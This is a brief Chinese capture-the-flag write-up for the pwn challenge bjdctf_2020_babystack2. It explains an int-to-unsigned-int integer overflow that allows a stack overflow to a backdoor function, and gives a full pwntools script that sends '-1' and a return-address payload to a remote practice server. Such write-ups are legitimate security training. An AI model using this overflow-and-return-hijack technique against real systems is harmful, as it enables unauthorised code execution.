bjdctf_2020_babystack2
checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell
from pwn import *
from LibcSearcher import *
#context.log_level="debug"
context(os='linux',arch='i386', log_level = 'debug')
#p=process('./bjdctf_2020_babystack2')
elf=ELF('./bjdctf_2020_babystack2')
p=remote('node4.buuoj.cn', 29027)
p.recvuntil('name:\n')
p.sendline('-1')
payload = b'a'*(0x10 + 8) + p64(0x400726)
p.sendline(payload)
p.interactive()

博客围绕bjdctf_2020_babystack2展开,该程序为64位小端序。IDA分析未发现明显输入溢出逻辑,但找到后门函数。经观察,数值存在从int到unsigned int的强制转换,判定为整型溢出。输入-1可突破长度限制,借此修改返回地址以getshell。
300

被折叠的 条评论
为什么被折叠?



